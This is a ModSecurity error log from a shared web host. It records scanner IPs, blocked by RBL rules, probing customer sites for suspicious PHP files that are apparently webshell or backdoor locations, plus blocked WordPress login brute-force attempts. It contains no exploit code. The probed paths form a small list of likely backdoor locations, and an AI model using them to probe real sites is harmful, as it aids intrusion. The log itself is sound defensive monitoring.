[Tue May 26 19:01:37.027705 2026] [security2:error] [pid 1045635:tid 1045789] [client 20.151.130.61:31357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/puc.php"] [unique_id "ahWguRhDcQXYr7SS5sUXQQAAABg"]
[Tue May 26 19:01:37.027809 2026] [security2:error] [pid 1045635:tid 1045789] [client 20.151.130.61:31357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/puc.php"] [unique_id "ahWguRhDcQXYr7SS5sUXQQAAABg"]
[Tue May 26 19:01:37.476021 2026] [security2:error] [pid 1045635:tid 1045856] [client 20.206.111.203:4563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWguRhDcQXYr7SS5sUXUQAAAFs"]
[Tue May 26 19:01:37.476110 2026] [security2:error] [pid 1045635:tid 1045856] [client 20.206.111.203:4563] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWguRhDcQXYr7SS5sUXUQAAAFs"]
[Tue May 26 19:01:37.837350 2026] [security2:error] [pid 1045635:tid 1045790] [client 20.151.130.61:59524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahWguRhDcQXYr7SS5sUXXwAAABk"]
[Tue May 26 19:01:37.837437 2026] [security2:error] [pid 1045635:tid 1045790] [client 20.151.130.61:59524] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahWguRhDcQXYr7SS5sUXXwAAABk"]
[Tue May 26 19:01:37.912583 2026] [security2:error] [pid 1045635:tid 1045878] [client 20.206.111.203:5069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWguRhDcQXYr7SS5sUXZAAAAHE"]
[Tue May 26 19:01:37.912678 2026] [security2:error] [pid 1045635:tid 1045878] [client 20.206.111.203:5069] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWguRhDcQXYr7SS5sUXZAAAAHE"]
[Tue May 26 19:01:38.021050 2026] [security2:error] [pid 1045635:tid 1045778] [client 139.60.101.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWguRhDcQXYr7SS5sUXaAAAAA0"], referer: https://anujtradingco.com
[Tue May 26 19:01:38.214915 2026] [security2:error] [pid 1045635:tid 1045791] [client 20.151.130.61:19620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWguhhDcQXYr7SS5sUXdgAAABo"]
[Tue May 26 19:01:38.215030 2026] [security2:error] [pid 1045635:tid 1045791] [client 20.151.130.61:19620] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWguhhDcQXYr7SS5sUXdgAAABo"]
[Tue May 26 19:01:38.498396 2026] [security2:error] [pid 1045635:tid 1045808] [client 178.20.210.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "velanstore.ca"] [uri "/index.php"] [unique_id "ahWguRhDcQXYr7SS5sUXXQAAACs"]
[Tue May 26 19:01:38.591572 2026] [security2:error] [pid 1045635:tid 1045812] [client 20.206.111.203:4555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWguhhDcQXYr7SS5sUXgwAAAC8"]
[Tue May 26 19:01:38.591708 2026] [security2:error] [pid 1045635:tid 1045812] [client 20.206.111.203:4555] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWguhhDcQXYr7SS5sUXgwAAAC8"]
[Tue May 26 19:01:39.140711 2026] [security2:error] [pid 1045635:tid 1045837] [client 20.206.111.203:4579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWguxhDcQXYr7SS5sUXmQAAAEg"]
[Tue May 26 19:01:39.140865 2026] [security2:error] [pid 1045635:tid 1045837] [client 20.206.111.203:4579] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWguxhDcQXYr7SS5sUXmQAAAEg"]
[Tue May 26 19:01:39.228042 2026] [security2:error] [pid 1045635:tid 1045799] [client 20.151.130.61:19633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahWguxhDcQXYr7SS5sUXmgAAACI"]
[Tue May 26 19:01:39.228143 2026] [security2:error] [pid 1045635:tid 1045799] [client 20.151.130.61:19633] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahWguxhDcQXYr7SS5sUXmgAAACI"]
[Tue May 26 19:01:39.296342 2026] [security2:error] [pid 1045635:tid 1045858] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWguhhDcQXYr7SS5sUXjAAAAF0"]
[Tue May 26 19:01:39.297929 2026] [security2:error] [pid 1045635:tid 1045666] [remote 162.214.206.32:48510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWguxhDcQXYr7SS5sUXmAAAdR4"]
[Tue May 26 19:01:39.445371 2026] [security2:error] [pid 1045635:tid 1045664] [remote 162.214.206.32:48510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWguxhDcQXYr7SS5sUXnAAAJxw"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 19:01:39.563443 2026] [security2:error] [pid 1045635:tid 1045797] [client 178.20.210.56:34162] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "velanstore.ca"] [uri "/index.php"] [unique_id "ahWguhhDcQXYr7SS5sUXiQAAIBo"]
[Tue May 26 19:01:39.849108 2026] [security2:error] [pid 1045635:tid 1045842] [client 20.151.130.61:19639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/p.php"] [unique_id "ahWguxhDcQXYr7SS5sUXqgAAAE0"]
[Tue May 26 19:01:39.849201 2026] [security2:error] [pid 1045635:tid 1045842] [client 20.151.130.61:19639] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/p.php"] [unique_id "ahWguxhDcQXYr7SS5sUXqgAAAE0"]
[Tue May 26 19:01:39.903459 2026] [security2:error] [pid 1045635:tid 1045823] [client 20.206.111.203:5119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWguxhDcQXYr7SS5sUXqwAAADo"]
[Tue May 26 19:01:39.903578 2026] [security2:error] [pid 1045635:tid 1045823] [client 20.206.111.203:5119] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWguxhDcQXYr7SS5sUXqwAAADo"]
[Tue May 26 19:01:40.361043 2026] [security2:error] [pid 1045635:tid 1045807] [client 20.206.111.203:4571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWgvBhDcQXYr7SS5sUXtgAAACo"]
[Tue May 26 19:01:40.361130 2026] [security2:error] [pid 1045635:tid 1045807] [client 20.206.111.203:4571] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWgvBhDcQXYr7SS5sUXtgAAACo"]
[Tue May 26 19:01:40.711225 2026] [security2:error] [pid 1045635:tid 1045891] [client 64.95.13.248:54510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 248.13.95.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-content/plugins/wpclean/wpclean.php"] [unique_id "ahWgvBhDcQXYr7SS5sUXwQAAAH4"]
[Tue May 26 19:01:40.765181 2026] [security2:error] [pid 1045635:tid 1045795] [client 20.206.111.203:5076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWgvBhDcQXYr7SS5sUXwgAAAB4"]
[Tue May 26 19:01:41.090770 2026] [security2:error] [pid 1045635:tid 1045873] [client 78.47.98.55:38698] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWgvRhDcQXYr7SS5sUXyQAAAGw"], referer: https://thegoodsporting.com
[Tue May 26 19:01:41.400358 2026] [security2:error] [pid 1045635:tid 1045799] [client 20.206.111.203:5063] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgvRhDcQXYr7SS5sUX0AAAACI"]
[Tue May 26 19:01:41.583319 2026] [security2:error] [pid 1045635:tid 1045881] [client 20.206.111.203:5076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-admin/js/"] [unique_id "ahWgvRhDcQXYr7SS5sUX1wAAAHQ"]
[Tue May 26 19:01:41.717219 2026] [security2:error] [pid 1045635:tid 1045815] [client 20.151.130.61:38374] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/Requests/"] [unique_id "ahWgvRhDcQXYr7SS5sUX3AAAADI"]
[Tue May 26 19:01:41.766442 2026] [security2:error] [pid 1045635:tid 1045842] [client 20.206.111.203:5063] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgvRhDcQXYr7SS5sUX4AAAAE0"]
[Tue May 26 19:01:41.946910 2026] [security2:error] [pid 1045635:tid 1045785] [client 20.206.111.203:5076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWgvRhDcQXYr7SS5sUX5AAAABQ"]
[Tue May 26 19:01:41.947062 2026] [security2:error] [pid 1045635:tid 1045785] [client 20.206.111.203:5076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWgvRhDcQXYr7SS5sUX5AAAABQ"]
[Tue May 26 19:01:42.067952 2026] [security2:error] [pid 1045635:tid 1045818] [client 146.56.204.198:54236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.204.56.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "proxuber.com"] [uri "/public/h-ui/lib/webuploader/0.1.5/server/preview.php"] [unique_id "ahWgvhhDcQXYr7SS5sUX6QAAADU"]
[Tue May 26 19:01:42.437258 2026] [security2:error] [pid 1045635:tid 1045855] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgvhhDcQXYr7SS5sUX5wAAAFo"]
[Tue May 26 19:01:42.512357 2026] [security2:error] [pid 1045635:tid 1045859] [client 20.206.111.203:5061] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWgvhhDcQXYr7SS5sUX-gAAAF4"]
[Tue May 26 19:01:42.512496 2026] [security2:error] [pid 1045635:tid 1045859] [client 20.206.111.203:5061] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWgvhhDcQXYr7SS5sUX-gAAAF4"]
[Tue May 26 19:01:42.780253 2026] [security2:error] [pid 1045635:tid 1045677] [remote 72.167.150.128:60344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWgvhhDcQXYr7SS5sUX_wAAUyk"]
[Tue May 26 19:01:42.941953 2026] [security2:error] [pid 1045635:tid 1045808] [client 20.151.130.61:19612] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgvhhDcQXYr7SS5sUYBgAAACs"]
[Tue May 26 19:01:42.990777 2026] [security2:error] [pid 1045635:tid 1045839] [client 20.206.111.203:5008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWgvhhDcQXYr7SS5sUYBwAAAEo"]
[Tue May 26 19:01:42.990896 2026] [security2:error] [pid 1045635:tid 1045839] [client 20.206.111.203:5008] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWgvhhDcQXYr7SS5sUYBwAAAEo"]
[Tue May 26 19:01:43.012918 2026] [security2:error] [pid 1045635:tid 1045765] [client 20.151.130.61:38374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahWgvxhDcQXYr7SS5sUYCAAAAAA"]
[Tue May 26 19:01:43.013000 2026] [security2:error] [pid 1045635:tid 1045765] [client 20.151.130.61:38374] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahWgvxhDcQXYr7SS5sUYCAAAAAA"]
[Tue May 26 19:01:43.456288 2026] [security2:error] [pid 1045635:tid 1045683] [remote 72.167.150.128:60344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWgvxhDcQXYr7SS5sUYFQAAFS8"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 19:01:43.578161 2026] [security2:error] [pid 1045635:tid 1045863] [client 20.206.111.203:5086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWgvxhDcQXYr7SS5sUYGwAAAGI"]
[Tue May 26 19:01:43.578266 2026] [security2:error] [pid 1045635:tid 1045863] [client 20.206.111.203:5086] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWgvxhDcQXYr7SS5sUYGwAAAGI"]
[Tue May 26 19:01:44.106878 2026] [security2:error] [pid 1045635:tid 1045792] [client 20.151.130.61:31358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahWgwBhDcQXYr7SS5sUYKgAAABs"]
[Tue May 26 19:01:44.106973 2026] [security2:error] [pid 1045635:tid 1045792] [client 20.151.130.61:31358] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahWgwBhDcQXYr7SS5sUYKgAAABs"]
[Tue May 26 19:01:44.349773 2026] [security2:error] [pid 1045635:tid 1045868] [client 20.206.111.203:4572] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahWgwBhDcQXYr7SS5sUYNAAAAGc"]
[Tue May 26 19:01:44.533938 2026] [security2:error] [pid 1045635:tid 1045806] [client 20.206.111.203:5063] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgwBhDcQXYr7SS5sUYPgAAACk"]
[Tue May 26 19:01:44.624520 2026] [security2:error] [pid 1045635:tid 1045867] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgwBhDcQXYr7SS5sUYLwAAAGY"]
[Tue May 26 19:01:44.713659 2026] [security2:error] [pid 1045635:tid 1045787] [client 20.206.111.203:4572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWgwBhDcQXYr7SS5sUYQwAAABY"]
[Tue May 26 19:01:44.713760 2026] [security2:error] [pid 1045635:tid 1045787] [client 20.206.111.203:4572] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWgwBhDcQXYr7SS5sUYQwAAABY"]
[Tue May 26 19:01:45.347532 2026] [security2:error] [pid 1045635:tid 1045881] [client 20.206.111.203:4548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWgwRhDcQXYr7SS5sUYUQAAAHQ"]
[Tue May 26 19:01:45.347619 2026] [security2:error] [pid 1045635:tid 1045881] [client 20.206.111.203:4548] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWgwRhDcQXYr7SS5sUYUQAAAHQ"]
[Tue May 26 19:01:45.440335 2026] [security2:error] [pid 1045635:tid 1045860] [client 20.151.130.61:19640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahWgwRhDcQXYr7SS5sUYUgAAAF8"]
[Tue May 26 19:01:45.440442 2026] [security2:error] [pid 1045635:tid 1045860] [client 20.151.130.61:19640] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahWgwRhDcQXYr7SS5sUYUgAAAF8"]
